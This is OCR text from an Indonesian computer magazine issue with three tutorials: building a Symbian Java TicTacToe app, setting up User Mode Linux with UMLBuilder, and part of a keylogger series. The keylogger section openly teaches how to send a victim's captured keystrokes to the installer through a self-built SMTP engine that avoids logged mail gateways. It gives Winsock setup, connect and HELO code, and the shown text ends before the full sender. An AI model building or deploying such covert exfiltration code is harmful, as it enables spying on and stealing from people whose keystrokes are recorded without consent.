Untuk mempercepat proses pembelajaran, ada baiknya kalau kita langsung mencoba contoh yang penulis sertakan, yaitu TicTacToe. Pertama-tama, bukalah file TicTacToe.zip (misal dengan WinZip) dan ekstraklah pada folder \Symbian\UIQ_70\erj.

Implementasi pJava 1.1.1
UIQ Java menyediakan implementasi spesifikasi Personal Java 1.1.1, yang informasi spesifikasi ini dapat dibaca di: http://java.sun.com/products/personaljava/spec-1-1-1/ index.html. Spesifikasi umumnya berisi API apa saja yang didukung dan mana yang tidak. Bagi anda yang pernah membuat aplikasi Java applet ataupun aplikasi Graphic User Interface (GUI) di Java mempergunakan AWT, Anda dapat dengan mudah mentransformasikan aplikasi tersebut menjadi aplikasi Symbian. Hanya, tentunya anda harus mempertimbangkan keterbatasan yang ada. Ada baiknya kalau Anda membaca dokumentasi yang disertakan, terutama pada bagian UIQ User Interface principles ( UIQ SDK > Java > Java Developer's Guide for UIQ > Developing for the UIQ User Interface > UIQ User Interface principles) dan UIQ Style Guide (UIQ SDK > UIQ Style Guide). Sebagai contoh, disini penulis memodifikasi TicTacToe applet yang biasanya disertakan sebagai demo di JDK menjadi sebuah aplikasi Symbian.

Gambar 2. Ekstrak ke folder \Symbian\UIQ_70\erj

Gambar 1. Proses pembuatan aplikasi Symbian 18

Gambar 3. Isi direktori \Symbian\UIQ_70\erj\TicTacToe

NeoTek Vol. IV No. 01

NeoTutor
Struktur directory keseluruhan bisa dilihat pada Gambar 3, dengan \Symbian\UIQ_70\erj\TicTacToe ditetapkan sebagai current directory. Jalankan batch file Build.bat untuk meng-compile file Java dan membuat file .jar (kumpulan file .class). Jika Anda gagal saat membuat file .jar, periksa kembali susunan PATH yang ada. Hal ini disebabkan, pada folder \Symbian\UIQ_70\epoc32\release\winscw\urel juga terdapat file jar.exe.

Menjalankan .Jar di Emulator
Untuk menjalankan aplikasi TicTacToe di emulator, Anda bisa mempergunakan batch file run.bat dengan isi sbb:
@echo off set appname=TicTacToe if not "%epocroot%" == "" goto epocok set EPOCROOT=\Symbian\UIQ_70\ echo WARNING: Setting EPOCROOT to %EPOCROOT%. You should add this to your environment variables. :epocok if not "%_epoc_drive_j%" == "" goto drivejok set _epoc_drive_j=%EPOCROOT%epoc32\java\ echo WARNING: Setting _epoc_drive_j to %_epoc_drive_j%. You should add this to your environment variables. :drivejok if not "%_epoc_drive_t%" == "" goto drivetok set _epoc_drive_t=%EPOCROOT%erj\ echo WARNING: Setting _epoc_drive_t to %_epoc_drive_t%. You should add this to your environment variables. :drivetok %epocroot%epoc32\release\winscw\udeb\pjava_g Dcom.symbian.appName=%appname% -cd t:\%appname% %appname% wait

Gambar 4. Meng-compile file Java menjadi file .jar

Isi batch file Build.bat adalah sebagai berikut:
@echo off set appname=TicTacToe if not "%epocroot%" == "" goto epocok set EPOCROOT=\Symbian\UIQ_70\ echo WARNING: Setting EPOCROOT to %EPOCROOT%. You should add this to your environment variables. :epocok if not "%_epoc_drive_j%" == "" goto drivejok set _epoc_drive_j=%EPOCROOT%epoc32\java\ echo WARNING: Setting _epoc_drive_j to %_epoc_drive_j%. You should add this to your environment variables. :drivejok if not "%_epoc_drive_t%" == "" goto drivetok set _epoc_drive_t=%EPOCROOT%erj\ echo WARNING: Setting _epoc_drive_t to %_epoc_drive_t%. You should add this to your environment variables. :drivetok set localclasspath=%epocroot%epoc32\java\lib\classes.zip;%epocroot%erj\classes; %epocroot%erj\ext\qawt.jar;%epocroot%erj\ext\util.jar;%epocroot%epoc32\java \ext\javaphone.jar cd %epocroot%\erj\%appname%\ @echo on javac -target 1.1 -classpath %localclasspath% -d . -deprecation *.java @echo off if errorlevel 1 goto failed jar -cvf install\%appname%.jar *.class echo Successfully compiled %appname% goto exit :failed echo Failed to compile %appname% :exit

Perhatikan bahwa saat meng-compile kita menggunakan parameter -target 1.1, sehingga hasil compile-nya dapat dijalankan pada Java VM versi 1.1. Hal ini disebabkan versi JDK yang dipergunakan oleh penulis adalah JDK 1.3.0, sedangkan pada dokumentasi direkomendasikan untuk menggunakan JDK 1.1.8. Untuk membuat menu sesuai dengan UIQ 2.0, dipergunaQ kan QAWT (Quartz AWT). Pada Symbian OS versi sebelumnya (seperti yang dipergunakan pada ponsel Nokia seri C 9200) dipergunakan CAWT (Crystal AWT). Dokumentasi mengenai API QAWT ini bisa dibaca di: \Symbian\UIQ_70\erj\utilities\Awt\docs\index.html.

Gambar 5. TicTacToe.jar dijalankan pada UIQ Emulator

Perhatikan bahwa parameter -Dcom.symbian.appName=%appname% berfungsi untuk memberikan title dari menu applikasi (di sebelah kiri menu Edit). Selain itu, kita juga mempergunakan parameter wait (cek source-code TicTacToe.java) saat dijalankan di emulator. Anda juga dapat mempergunakan batch file run2.bat dengan isi sebagai berikut untuk menjalankan aplikasi TicTacToe di emulator: Vol. IV No. 01 NeoTek
19

NeoTutor
@echo off set appname=TicTacToe if not "%epocroot%" == "" goto epocok set EPOCROOT=\Symbian\UIQ_70\ echo WARNING: Setting EPOCROOT to %EPOCROOT%. You should add this to your environment variables. :epocok if not "%_epoc_drive_j%" == "" goto drivejok set _epoc_drive_j=%EPOCROOT%epoc32\java\ echo WARNING: Setting _epoc_drive_j to %_epoc_drive_j%. You should add this to your environment variables. :drivejok if not "%_epoc_drive_t%" == "" goto drivetok set _epoc_drive_t=%EPOCROOT%erj\ echo WARNING: Setting _epoc_drive_t to %_epoc_drive_t%. You should add this to your environment variables. :drivetok %epocroot%epoc32\release\winscw\udeb\pjava_g Dcom.symbian.appName=%appname% -cd t:\%appname% -cp t:\%appname%\install\%appname%.jar %appname% wait

Perbedaannya adalah anda mempergunakan file .jar, bukan lagi file-file .class.

Membuat Aplikasi sampai Icon dengan AIFBuilder

Gambar 7. Aplikasi Java TicTacToe mempunyai Application UID (Unique Identifier)

Gambar 6. Menjalankan AIFBuilder

Tahap selanjutnya adalah menjalankan batch file AIFBuilder. AIFBuilder dapat dikatakan sebuah tool yang lengkap, karena dapat membuat file .mbm (MultiBitmap) dan file-file .aif (application information file), .app (application file), dan a a .txt yang ketiga file ini penting saat membuat file SIS S (Symbian Installation). • File .aif berisi resource, seperti kumpulan ikon beserta mask-nya, serta caption. U • Salah satu isi file .app adalah UID (Unique Identifier) yang terdapat pada offset 0x08 hingga 0x0B dalam bentuk binary (32 bit). • Sedangkan isi file .txt adalah command-line untuk menjalankan aplikasi pJava tersebut. Perhatikan bahwa UID bersifat unik. Jika anda membaca dokumentasi yang disertakan, di sana disebutkan bahwa kita bisa mempergunakan temporary UID dengan range 0x01000000 hingga 0x0fffffff untuk dipergunakan pada saat development. Dan, developer bisa meminta permohonan untuk UID ini dengan mengirim e-mail ke: UID@symbiandevnet.com.
20

Gambar 8. UI Variants berisi rincian informasi icon, lokasi untuk men-generate file, serta temporary file dari aplikasi.

Gambar 9. Caption language dapat dipilih.

NeoTek Vol. IV No. 01

NeoTutor
Untuk informasi lebih lanjut, bisa dilihat pada situs Symbian Developer Network dengan URL sebagai berikut: http://www.symbian.com/developer/techlib/papers/tn%5F uid/uidinfo.html Untuk mempermudah pembelajaran, ada baiknya kalau anda me-load file TicTacToe.aifb. Jika Anda perhatikan, file .aifb sebenarnya merupakan file .xml, yang untuk TicTacToe.aifb isinya sebagai berikut:
<?xml version="1.0" encoding="UTF-8"?> <AIFBPROJECTFILE> <APPLICATION NAME="TicTacToe" UID="0x0F0F0F0F" LANGUAGE="JAVA"> <COMMAND>-cp .;TicTacToe.jar TicTacToe</COMMAND> </APPLICATION> <DFRD MBM="C:\Symbian\UIQ_70\erj\TicTacToe\TicTacToe.mbm"> <DFRDNAME>UIQ</DFRDNAME> <OUTPUTLOC OUTPUTDIR="C:\Symbian\UIQ_70\erj\TicTacToe\install\" WORKINGDIR="C:\Symbian\UIQ_70\erj\TicTacToe\install\" /> </DFRD> <CAPTION LANGUAGE="British English"> <TEXT>The Symbian TicTacToe</TEXT> </CAPTION> </AIFBPROJECTFILE>

AIFBuilder error codes and solutions Many people have been encountering the errors below while attempting to use AIFBuilder. Errorcode 2 means that there's no default device selected. To avoid this problem, select a default device by typing "devices -setdefault @<devicename>" in a command line window. The <devicename> can be found by typing "devices" in the command line window. Errorcode 33 means that the AIFBuilder can't find the file aiftool.rh. To avoid this problem, make sure aiftool.rh is in <UIQROOT>\epoc32\include\. If it's not there, you can extract it manually from the installfile com.symbian.api.GT-shared_0_0_70.sdkpkg using WinZip.

Sebenarnya, penulis pernah mengalami kegagalan saat meng-klik tombol Generate, sehingga sempat membuat bete :) . Akhirnya penulis berinisiatif utnuk men-decompile file-file .class yang terdapat pada file AIFBuilder.jar yang terdapat pada folder \Symbian\UIQ_70\epoc32\tools\AIFBuilder. yang pada source-code CGenerateFiles penulis mendapatkan informasi yang menarik. Berikut ini adalah salah satu kutipannya:
private void createAIFFile(File file, File file1) throws CGenerateException, CInvalidDataException, IOException { if(!file.exists() || !file1.exists()) { file.delete(); throw new CGenerateException(iResourceBundle.getString("EitherRSSorMBMFileDoesNotExi st_Error")); } String s = file.toString().substring(0, file.toString().toLowerCase().indexOf("rss")) + "aif"; try { checkOverWrite(s); } catch(IOException ioexception) { file.delete(); Object aobj[] = { s }; throw new CGenerateException(i18nHelper_Methods.getFormattedString(iResourceBundle.g etString("CannotOverwriteExistingAIFFile_Error"), aobj)); } String s1; if(null == KSystemTempDir || KSystemTempDir.equals("")) s1 = "C:\\"; else s1 = KSystemTempDir; String s2 = System.getProperty("jarfile").toLowerCase(); String s3 = s2.substring(0, s2.indexOf("epoc32\\tools\\aifbuilder\\aifbuilder.jar")); String s4 = s1 + file.getName().substring(0, file.getName().toLowerCase().indexOf("rss")) + "rpp"; StringBuffer stringbuffer = new StringBuffer(); if(null != KCWGNUToolsPath) stringbuffer.append(KCWGNUToolsPath); stringbuffer.append("cpp.exe"); StringBuffer stringbuffer1 = new StringBuffer(); stringbuffer1.append("-undef -C -D_UNICODE"); stringbuffer1.append(" "); stringbuffer1.append("-I"); stringbuffer1.append(" "); stringbuffer1.append(s3); stringbuffer1.append("epoc32\\include"); stringbuffer1.append(" "); stringbuffer1.append(file.toString()); stringbuffer1.append(" "); stringbuffer1.append(s4); StringBuffer stringbuffer2 = new StringBuffer(); if(null != KCWGNUToolsPath) { stringbuffer2.append(s3); stringbuffer2.append("epoc32\\tools\\"); } stringbuffer2.append("rcomp.exe"); StringBuffer stringbuffer3 = new StringBuffer();

M Untuk membuat file .mbm (MultiBitmap) yang berisi kumpulan ikon beserta mask-nya, bisa gunakan AIFBuilder. Yaitu, pilih menu: Action > Create MBM.

Gambar 10. Membuat MultiBitmap pada AIFBuilder

Untuk menggenerate file-file .aif, .app, dan .txt, Anda tinggal meng-klik tombol Generate. Jika Anda gagal saat mempergunakan AIFBuilder, mungkin newsletter berikut ini yang pernah penulis terima dari Sony Ericsson dapat membantu:

Vol. IV No. 01 NeoTek

21

NeoTutor
stringbuffer3.append("-u"); stringbuffer3.append(" "); stringbuffer3.append("-o"); stringbuffer3.append(s1); stringbuffer3.append("aif.rsc"); stringbuffer3.append(" "); stringbuffer3.append("-s"); stringbuffer3.append(s4); stringbuffer3.append(" "); stringbuffer3.append("-i"); stringbuffer3.append(file.toString()); StringBuffer stringbuffer4 = new StringBuffer(); stringbuffer4.append(s3); stringbuffer4.append("epoc32\\release\\winc\\urel\\"); stringbuffer4.append("aiftool.exe"); StringBuffer stringbuffer5 = new StringBuffer(); stringbuffer5.append(s1); executeTool(stringbuffer.toString(), stringbuffer1.toString(), s1.toString()); executeTool(stringbuffer2.toString(), stringbuffer3.toString(), s1.toString()); copyFile(file1, new File(s1 + "aif.mbm")); executeTool(stringbuffer4.toString(), stringbuffer5.toString(), s1.toString()); copyFile(new File(s1 + "out.aif"), new File(s)); }

Perhatikan bahwa file .pkg yang dibuat adalah yang sederhana (simple). Sebab, Anda bisa menambahkan banyak hal kedalam file .pkg seperti yang ditunjukkan pada Gambar 11. Ada tool bernama Sisar yang mampu pula membuat file .pkg, namun tool tersebut khusus untuk Symbian OS 6. Pada file .pkg, Anda juga harus memperhatikan Product/ platform version. Untuk Sony Ericsson P80x (P800/P802) berisi sebagai berikut:
(0x101F80BE), 1, 0, 0, {"SonyEricssonP80xPlatformProductID"}

Namun, jika Anda ingin mencoba untuk meng-install file SIS di emulator pada menu Launcher > Install, maka bisa Anda mengisi Product/platform version dengan:
(0x101F617B), 2, 0, 0, {"UIQ20ProductID"}

Pertama-tama penulis mencek apakah file-file .exe yang dipergunakan terdapat pada directory yang tercantum serta pada PATH. Ternyata, untuk bagian pertama ini lolos. Selanjutnya, perhatian penulis tertuju pada executeTool(). Seperti kita ketahui, umumnya command shell membutuhkan alokasi memory yang lumayan besar. Akhirnya, penulis memutuskan untuk membuang environment variable yang tidak terpakai (tidak ada sangkut-pautnya untuk pembuatan aplikasi pJava). Ternyata, keputusan ini membuahkan hasil yang diharapkan.

Hasil dari instalasi ini akan disimpan di RAM (folder \Symbian\UIQ_70\epoc32\winscw\c\system\Apps). Sayangnya, emulator tidak mampu untuk menjalankan aplikasi pJava yang ada di RAM ini.

File .pkg dan .SIS .
Tinggal dua tahap lagi yang harus dilakukan, yaitu memp S buat file .pkg (package control file) dan file SIS (Symbian Installation). Hanya, saat penulis surfing di internet, penulis mendapatkan batch file yang dapat meng-generate keduanya (tentunya tetap harus Anda sesuaikan dengan aplikasi Anda), dimana file-file yang diperlukan adalah sbb: • install.bat • install2.pl • packageheader.txt Isi selengkapnya dari ketiga file tersebut bisa Anda peroleh pada CD NeoTek. Isi file .pkg yang digenerate oleh batch file install.bat adalah sebagai berikut:
#{"TicTacToe"},(0x0F0F0F0F),1,5,0,TYPE=SA (0x101F80BE), 1, 0, 0, {"SonyEricssonP80xPlatformProductID"} ; For UIQ 2.0, the platform version string is: ; (0x101F617B), 2, 0, 0, {"UIQ20ProductID"} ;This file was generated by install script. Do not edit this file. ;Edit packageheader.txt file instead. "install\images\cross.gif"-"!:\system\apps\TicTacToe\images\cross.gif" "install\images\not.gif"-"!:\system\apps\TicTacToe\images\not.gif" "install\TicTacToe.aif"-"!:\system\apps\TicTacToe\TicTacToe.aif" "install\TicTacToe.app"-"!:\system\apps\TicTacToe\TicTacToe.app" "install\TicTacToe.jar"-"!:\system\apps\TicTacToe\TicTacToe.jar" "install\TicTacToe.txt"-"!:\system\apps\TicTacToe\TicTacToe.txt"

Gambar 11. Berbagai komponen dijadikan Package file dan kemudian menjadi Installation file 22

Gambar 12. Hasil akhir berupa aplikasi pJava

NeoTek Vol. IV No. 01

NeoTutor

Membuat ‘VMware’ Sendiri
Virtual machine memang menyenangkan. Anda bisa mencoba program baru, menjalankan patch kernel, maupun eksperimen lain tanpa mengganggu sistem yang berjalan. Memiliki sebuah komputer bayangan yang siap menjadi bahan percobaan. Hebatnya, anda hanya perlu software emulasi.
Mulyadi Santosa, a_mulyadi@telkom.net, moderator clustering-id@yahoogroups.com VMWare tidak asing lagi. Program ini adalah satu program virtual machine yang sangat handal. Mendukung emulasi PC untuk menjalankan hampir semua sistem operasi, mulai dari Windows (9x/NT/2000/XP), Linux, sampai BSD, dsb. VMWare tersedia untuk beberapa jenis platform, di antaranya Windows dan Linux. Namun, VMWare ini tidak gratis, dan anda harus membayar lisensi untuk banyaknya virtual machine yang ingin dijalankan. Lalu bagaimana untuk pengguna Linux? Ada berita bagus. Beberapa pengembang kernel Linux mempunyai ide membuat patch pada kernel Linux sehingga bisa dijalankan di user level. Apa maksudnya? Dengan patch ini, kernel Linux akan menjadi aplikasi biasa, dan bisa dijalankan layaknya program lainnya dari console atau XWindow. Dan anda bisa menjalan user mode Linux ini sebanyak yang anda mau. Anda hanya dibatasi oleh memori yang tersedia, ruang hard disk, serta kemampuan prosesor untuk menanganinya. Memang, karena yang dijalankan adalah kernel Linux, maka resource yang terpakai cukup banyak.

U M L B U I LD E R

B

AGI SEBAGIAN PEMBACA, MUNGKIN NAMA PROGRAM

Instalasi Paket User Mode Linux
OK, kita mulai. install paket user mode linux dengan cara:
# rpm -Uvh user_mode_linux-2.4.19.5um-0.i386.rpm

Anda akan melihat bahwa file-file berikut akan diinstal dalam sistem anda. Bisa di-cross-check dengan perintah rpm -ql user_mode_linux
/usr/bin/jailtest /usr/bin/linux /usr/bin/tunctl /usr/bin/uml_mconsole /usr/bin/uml_moo /usr/bin/uml_net /usr/bin/uml_switch /usr/lib/uml/config /usr/lib/uml/modules-2.2.tar /usr/lib/uml/modules-2.4.tar /usr/lib/uml/port-helper

Ini adalah file-file penting yang nantinya mendukung operasi virtual machine Linux anda.

Instalasi UMLBuilder
Berikutnya install UMLBuilder:
# rpm -Uvh umlbuilder-1.40-5.i386.rpm

User Mode Linux dan UML Builder
Pada artikel ini akan diterangkan kombinasi software yang memudahkan anda menyiapkan virtual machine Linux, yaitu paket RPM User Mode Linux (untuk kernel-nya) serta UMLBuilder (untuk menyiapkan root filesystem-nya). Anda bisa juga mem-patch kernel Linux secara manual, namun akan memakan waktu agak lama. Demikian juga menyiapkan root filesytem sebagai virtual hard disk, akan sangat dimudahkan oleh UMLBuilder, karena prosesnya 99% sudah diotomatiskan s Arahkan browser anda ke user-mode-linux.sourceforge.net. Ambil file RPM berisi binary kernel user mode linux. Penulis men-download file user_mode_linux-2.4.19.5um-0.i386.rpm. Anda boleh menggunakan versi kernel yang lebih baru atau yang lebih lama. Hal tersebut aman-aman saja, karena hanya berpengaruh pada versi kernel yang berjalan di virtual machine. Jadi misal komputer anda sekarang menjalankan kernel 2.4.18, anda bisa saja menggunakan kernel 2.4.17 untuk user mode. Inilah keuntungan virtual machine. Untuk mendapatkanUMLBuilder, arahkan browser ke umlbuilder.sourceforge.net. Mirip seperti user mode linux, ambil file RPM-nya. Dalam contoh ini penulis menggunakan umlbuilder-1.40-5.i386.rpm. Sebagai catatan, jika kelak anda ingin menjalankan UMLBuilder di XWindow, anda perlu meng-install paket Python dan Tkinter. Penulis menjalankan semua eksperimen ini pada distro Redhat 7.3. Tambahan lainnya, UMLBuilder dibuat untuk mendukung instalasi distribusi berbasis RPM, jadi distro dengan sistem instalasi lain, semisal Debian (.deb) sementara belum di-support secara langsung.

Pastikan Profile distribusi yang nanti akan anda install, ada pada direktori /usr/lib/uml/umlbuilder/profiles/. Jadi jika anda akan menggunakan Redhat 7.3, maka semestinya ada subdirektori Redhat7.3.p. Secara lengkap, sejauh ini UML Builder mensupport profile distribusi: • Caldera2.4.p • CalderaDesktop3.1.1.p • CalderaDesktop3.1.p • Conectiva7.0.p • Conectiva8.0.p • Mandrake8.1.p • Mandrake8.2.p • Mandrake9.0.p • RedFlag3.0.p • Redhat6.2.p • Redhat7.1.p • Redhat7.2.p • Redhat7.3.p • Redhat8.0.p • RedhatAdvancedServer2.1.p • Suse7.2pro.p • Suse7.3pro.p • Trustix1.5.p • TurboLinux7.0.p Langkah berikutnya, cop-kan semua RPM binary dari CD ROM distribusi. Mengapa demikian? Karena UMLBuilder perlu mengindeks file-file RPM anda untuk keperluan proses instalasi, dan akan menciptakan file rpmindex.py. Vol. IV No. 01 NeoTek
23

NeoTutor
Dengan demikian, UMLBuilder memerlukan direktori yang writeable, jadi jelas tidak mungkin di CD ROM. Disini penulis mengasumsikan, anda akan membuat Virtual Machine Linux dengan distribusi RedHat 7.3, dan semua file RPM (anda bisa dapatkan dari CD InfoLinux bulan Juli dan September 2003) di-copy ke direktori /distro.
Gambar 3. Proses Instalasi UMLBuilder

Menjalankan UMLBuilder
Setelah itu, anda bisa mulai menjalankan UMLBuilder (pada mode GUI) sebagai berikut:
# umlbuilder_gui

Akan muncul layar sebagai tampak pada Gambar 1. Klik tombol Next.
Gambar 1. Menjalankan UMLBuilder

Gambar 4. Opsi untuk mengatur ukuran file

Pada layar berikutnya, anda akan ditanyai distribusi yang akan anda pakai (Gambar 2). Dalam contoh ini, pilih Redhat 7.3, lalu klik Next.
Gambar 2. Pilihan distro Linux yang digunakan

Pada layar berikutnya, anda akan dihadapkan pada opsi untuk mengatur ukuran file system anda (Gambar 4). Ini akan menjadi virtual hard disk anda. Anda bisa menerima nilai default 1024 MB (satuan selalu dalam Mega byte) untuk r dimount di / (root). Anda bisa saja menambah mount point lain serta mengatur ukurannya, namun untuk sementara, saat ini cukup satu mount point. Catatan: agak berbeda dengan instalasi biasa, nama device untuk User Mode Linux menggunakan penamaan dengan awalan ubd, misal ubd0, ubd1, dst. Klik Next.

Setting Tambahan pada UMLBuilder
Selanjutnya, anda akan menghadapi layar setting tambahan UML, antara lain besarnya memori, swap. dan selanjutnya (Gambar 6). Disini anda bisa menerima default, atau mengubahnya. Penulis men-set sbb: Hostname : redhat73.localdomain IP Address : 192.168.0.12 Memory Size : 128 MB Swap size : 256 MB Root password : reptile Number of terminals : 2 Graphical login : No Extra UML Argument : (kosongkan saja) Host Interface : eth0 Initial Ramdisk : Yes Layar berikutnya, anda akan ditanyai dimana akan menyimpan semua hasil setting UMLBuilder beserta root filesystemnya (Gambar 6). Misal isikan /root/redhat73, lalu Next. Maka akan muncul layar berisi ringkasan setting yang telah anda isikan (Gambar 7), anda bisa memeriksa sejenak konfigurasi anda.

Setelah itu, akan ada pertanyaan dimana letak direktori file RPM anda. Masukkan /distro, lalu tekan Next. Akan ada informasi bahwa file RPM anda sedang di-indeks. Jika ini baru pertama kalinya anda mengindeks lokasi direktori /distro, maka proses akan berjalan agak lama. Namun untuk berikutnya, jika anda menjalankan UMLBuilder, maka index yang telah dihasilkan bisa langsung dipakai. Jadi proses indexing akan mempercepat eksekusi kalau anda mau mengubah setting root filesystem atau membuat lagi dari awal. Segera akan disusul pertanyaan, paket apa saja yang akan anda install (Gambar 3). Paket yang wajib anda install adalah Core karena merupakan inti sistem, sisanya terserah anda. Untuk memilih lebih dari satu opsi, tahan tombol Ctrl sambil memilih nama paket yang diinginkan. Disini, penulis memilih Core, XWindow System, dan KDE. Klik Next.
24

NeoTek Vol. IV No. 01

NeoTutor
Gambar 5. Setting tambahan pada UMLBuilder Gambar 8. Proses Instalasi

Gambar 6. Direktori instalasi

Sesi virtual machine akan di-start seperti Gambar 9. Anda akan mendapat layar login seperti layaknya anda login di Linux ‘nyata’. Masukkan saja username root dan password yang telah anda set pada entri UMLBuilder tadi, dan voila!, anda mulai bekerja di Virtual Machine Linux. Disini penulis membuka 2 console virtual, satu console bernavigasi dengan MIdnight Commander, satu sesi sedang melakukan perintah find.

Ringkasan Command Line
Perintah diatas bisa disingkat dengan perintah command line sbb:
# umlbuilder --dir /root/redhat73 --distro Redhat7.3 \ --modules core,X,kde --rpmdir /distro --memsize 128 \ --swapsize 256 --rootpw reptile --numttys 2 \ --hostname redhat73.localdomain --ipaddr 192.168.0.12 \ --fssize 1024

Gambar 7. Summary

Penjelasan singkat opsi diatas sbb: --dir untuk menentukan direktori instalasi tempat UMLBuilder membuat virtual machine kita --distro untuk memilih nama distribusi yang akan dipakai UMLBuilder sebagai sumber RPM instalasi. Anda bisa memakai parameter --distro list untuk mendapat daftar lengkap --modules untuk memilih paket-paket yang akan diinstall. Mirip dengan --distro, anda bisa menambahkan opsi "list" untuk mendapatkan daftar paket yang bisa anda pilih. Sebagai catatan, minimal anda memilih paket "base" --rpmdir untuk menentukan lokasi dimana anda meng-copy file RPM dari CD Distro Linux anda --memsize untuk mengatur besar memori untuk virtual machine anda --swapsize untuk mengatur besar file swap virtual machine anda --rootpw untuk menset password root di virtual machine anda --numttys untuk mengatur berapa virtual console yang akan langsung tampil setelah proses booting virtual machine selesai --hostname untuk menset nama host virtual machine anda --ipaddr untuk menset IP address virtual machine --fssize untuk mengatur besarnya file system anda (dalam satuan MB). Ini akan menjadi hard disk virtual anda

Tekan Finish, maka proses pembuatan root filesystem akan dimulai (Gambar 8). Proses ini agak lama, jadi anda bisa beristirahat sejenak. Sambil melihat UMLBuilder berjalan, anda bisa menyaksikan UMLBuilder melakukan cukup banyak perintah, mulai dari meng-copy file RPM, membuat virtual memori dan swap, mengatur setting hostname, sampai membuat script yang memudahkan anda mengontrol Virtual Machine anda. Bisa anda bayangkan jika anda melakukannya sendiri, jelas akan memakan waktu lama, apalagi jika anda seorang pemula! Pada akhir proses instalasi, UML Builder akan memberitahu, bahwa instalasi telah dilakukan pada direktori yang anda spesifikasikan (dalam hal ini /root/redhat73). Tekan Complete/Finish, dan sesi UMLBuilder akan diakhiri. Jalankan virtual machine anda dengan mengetikkan dari console dalam session XWindow (ya, anda harus menjalankan XWindow dahulu).
# /root/redhat73/control start

Vol. IV No. 01 NeoTek

25

NeoTutor

Dikirim Otomatis ke Pemasang
Dewanata (m_strdewanata@yahoo.com) kali ini membahas cara membuat SMTP engine sendiri agar keylogger yang dibuat dapat secara otomatis mengirim hasil tangkapannya ke pemasang keylogger, walaupun pada komputer korban tidak terpasang program email client.
artikel yang membahas pembuatan keylogger. Untuk sekedar mengingat kembali, pada artikel pertama (NeoTek III/8) telah dijelaskan mengenai proses dasar intersepsi aktivitas keyboard dan pada artikel kedua (NeoTek III/12) dijelaskan mengenai trik untuk melakukan identifikasi program yang sedang aktif ketika keyboard ditekan. Seperti telah dijelaskan pada artikel pertama, hasil intersepsi keyboard disimpan dalam file di suatu tempat di hardisk lokal. Hal ini akan merepotkan pemasang keylogger karena untuk mendapatkan/membaca file tersebut, ia harus masuk ke komputer korban. Artikel ini menjelaskan mengenai satu metode untuk mengirimkan file hasil intersepsi tersebut dari komputer korban ke komputer pemasang keylogger, menggunakan email.

HAS I L I NTE RS E PS I K EYLOG G E R

A

RTIKEL INI ADALAH ARTIKEL KETIGA DARI SERANGKAIAN

Langkah-langkah tersebut akan dijelaskan di baris-baris di bawah ini. Coding menggunakan Visual C++ 6.0.

1. Inisialisasi Sistem
Untuk dapat memanfaatkan fungsi-fungsi socket, sertakan baris ini di file header proyek:
#include <afxsock.h>

2. Membuka Soket
Ada dua tahapan dalam membuka socket: • Inisialisasi socket menggunakan fungsi WSAStartup()
WORD wver = MAKEWORD(1,1); WSADATA wsd; ::WSAStartup(wver, &wsd);

• Pembukaan socket menggunakan fungsi socket
SOCKET sSocket; sSocket=::socket(AF_INET, SOCK_STREAM, 0);

Pembuatan Mesin SMTP
Pernahkah anda mendengar virus yang mempunyai kemampuan mengirimkan email dengan menggunakan SMTP engine-nya (mesin SMTP) sendiri? Hal ini menyebabkan virus tetap dapat mengirimkan email walaupun komputer korban tidak pernah dikonfigurasi untuk keperluan tersebut. Proses deteksi menjadi lebih sulit, karena pengiriman tidak dilakukan melalui "gerbang" SMTP resmi yang biasanya memiliki log dan restriksi tertentu. Prinsip Dasar Pada dasarnya pengiriman email adalah mengirimkan satu rangkaian data dari satu end-point (komputer korban) ke end-point lainnya (server penerima). Karena ini adalah email, maka protokol yang digunakan adalah SMTP (RFC 821). Server yang menerima rangkaian data ini biasanya adalah server SMTP dan port yang umum digunakan adalah 25. Socket Pada C/C++, penggunakan socket sangat umum digunakan untuk pengiriman data. Pada dasarnya, socket adalah endpoint satu proses komunikasi, yang digunakan oleh program untuk mengirimkan dan menerima paket-paket data melintasi jaringan. Mekanisme Dasar Pada dasarnya, proses pengiriman email dilakukan dengan melakukan langkah-langkah di bawah ini: 1. Inisialisasi sistem 2. Membuka socket 3. Membuka koneksi 4. Mengirimkan data 5. Menerima respon 6. Menutup socket dan koneksi Langkah ke 1, 2, 3 dan 6 dilakukan satu kali pada setiap batch pengiriman, sedangkan langkah 4 dan 5 dilakukan berulang kali, sesuai dengan kebutuhan dan respon server.
26

Keterangan: AF_INET tipe pengalamatan (address family) yang digunakan SOCK_STREAM spesifikasi socket ini adalah koneksi dua arah, seku ensial, dan reliable (TCP/IP).

3. Membuka Koneksi
Ada beberapa tahapan yang dilakukan pada langkah ini. • Mendapatkan informasi mengenai host/server SMTP
hostent * host; host=::gethostbyname(szSmtpserver);

Keterangan: hostent szSmtpserver

adalah struktur yang berisi informasi alamat host char[] yang menyimpan nama server smtp. Misal: hotpop.com, smtp.indo.net.id, smtp.mail.yahoo.com, dll.

• Mendapatkan alamat host
int iPortnumber = 25; sockaddr_in sa_in; sa_in.sin_family = AF_INET; sa_in.sin_port = htons(iPortnumber); sa_in.sin_addr=*((in_addr*) host->h_addr_list[0]);

Keterangan: Sockaddr_in

adalah struktur informasi alamat host, secara spesifik didesain untuk menyuplai parameter fungsi connect() (lihat baris selanjutnya).

• Membuka koneksi
::connect(sSocket,(sockaddr*) &sa_in, sizeof(sa_in))

4. Mengirimkan Data
char s[] = "HELO\r\n"; ::send(sSocket,s,strlen(s),0);

Proses pengiriman data dilakukan menggunakan fungsi send(); Pada contoh di atas, dikirim satu string HELO\r\n ke server. Seperti telah dijelaskan sebelumnya langkah 4 dan 5 akan dilakukan berulang-kali dan akan diterangkan di bagian selanjutnya.

NeoTek Vol. IV No. 01

NeoTutor
5. Menerima Respon
Pengiriman email pada dasarnya adalah satu rangkaian proses komunikasi antara komputer lokal dan server SMTP. "Bahasa" yang digunakan harus sesuai dengan yang dijabarkan di RFC821/822. Adalah penting untuk memeriksa respon server terhadap setiap request yang kita kirim agar dapat menentukan langkah selanjutnya. Untuk menerima respon, kita menggunakan fungsi recv().
char chtemp[1024]; ::recv(sSocket, chtemp, sizeof(chtemp), 0);

Implementasi
